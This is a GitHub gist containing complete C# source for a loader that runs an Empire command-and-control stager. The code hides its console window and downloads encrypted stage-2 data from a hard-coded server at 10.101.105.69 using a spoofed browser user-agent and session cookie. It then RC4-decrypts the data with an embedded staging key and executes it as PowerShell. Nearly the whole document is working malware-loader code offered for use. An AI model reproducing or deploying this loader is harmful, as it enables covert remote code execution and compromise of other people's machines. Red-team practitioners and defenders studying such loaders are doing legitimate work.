Skip to content

Instantly share code, notes, and snippets.

@chr0n1k

chr0n1k/Empire-Loader.cs

Created October 13, 2020 14:04
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save chr0n1k/7a896c4575da4b683d073774e2ce1507 to your computer and use it in GitHub Desktop.
Save chr0n1k/7a896c4575da4b683d073774e2ce1507 to your computer and use it in GitHub Desktop.
Download ZIP
A C# implementation of a loader to execute an Empire stager
Raw
Empire-Loader.cs
// csc.exe empire.cs /reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System;
using System.Collections.Generic;
using System.Linq;
using System.Management.Automation;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace PSEmpire_Stage1
{
class Program
{
// RC4 Class to decrypt the stage 2 data
// Created by Jeong ChangWook. Source https://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4
public class RC4
{
public static byte[] Encrypt(byte[] pwd, byte[] data)
{
int a, i, j, k, tmp;
int[] key, box;
byte[] cipher;
key = new int[256];
box = new int[256];
cipher = new byte[data.Length];
for (i = 0; i < 256; i++)
{
key[i] = pwd[i % pwd.Length];
box[i] = i;
}
for (j = i = 0; i < 256; i++)
{
j = (j + box[i] + key[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
}
for (a = j = i = 0; i < data.Length; i++)
{
a++;
a %= 256;
j += box[a];
j %= 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
k = box[((box[a] + box[j]) % 256)];
cipher[i] = (byte)(data[i] ^ k);
}
return cipher;
}
public static byte[] Decrypt(byte[] pwd, byte[] data)
{
return Encrypt(pwd, data);
}
}
// Hide Windows function by our friends from StackOverFlow
// https://stackoverflow.com/questions/34440916/hide-the-console-window-from-a-console-application
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
static void Main(string[] args)
{
// To Hide the ConsoleWindow (It may be a better way...)
var handle = GetConsoleWindow();
ShowWindow(handle, 0);
// Avoid sending Expect 100 Header
System.Net.ServicePointManager.Expect100Continue = false;
// Create a WebClient Object (No Proxy Support Included)
WebClient wc = new WebClient();
string ua = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
wc.Headers["User-Agent"] = ua;
wc.Headers["Cookie"] = "DtMtDDhynCf=UXhs4XZoDVgeYUUqjCOmMWILVOk=";
// Set the Server Address and URL
string server = "http://10.101.105.69:80";
string target = "/login/process.php";
// Download The Data or Stage 2
byte[] data = wc.DownloadData(server + target);
// Extract IV
byte[] iv = data.Take(4).Select(i => i).ToArray();
// Remove the IV from the data
byte[] data_noIV = data.Skip(4).ToArray();
// Set Key value for decryption. PowerEmpire StageingKey value
string key = "0cb1670e6af5c5a08f74e922189da53a";
byte[] K = Encoding.ASCII.GetBytes(key);
// Combine the IV + Key (New random key each time)
byte[] IVK = new byte[iv.Length + K.Length];
iv.CopyTo(IVK, 0);
K.CopyTo(IVK, iv.Length);
// Decrypt the Message
byte[] decrypted = RC4.Decrypt(IVK, data_noIV);
// Convert the stage2 decrypted message from bytes to ASCII
string stage2 = System.Text.Encoding.ASCII.GetString(decrypted);
// Create a PowerShell Object to execute the command
PowerShell PowerShellInstance = PowerShell.Create();
// Create the variables $ser and $u which are part of the downloaded stage2
PowerShellInstance.Runspace.SessionStateProxy.SetVariable("ser", server);
PowerShellInstance.Runspace.SessionStateProxy.SetVariable("u", ua);
// Add the Script Stage 2 to the Powershell Object
PowerShellInstance.AddScript(stage2);
// Execute the Script!
PowerShellInstance.Invoke();
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment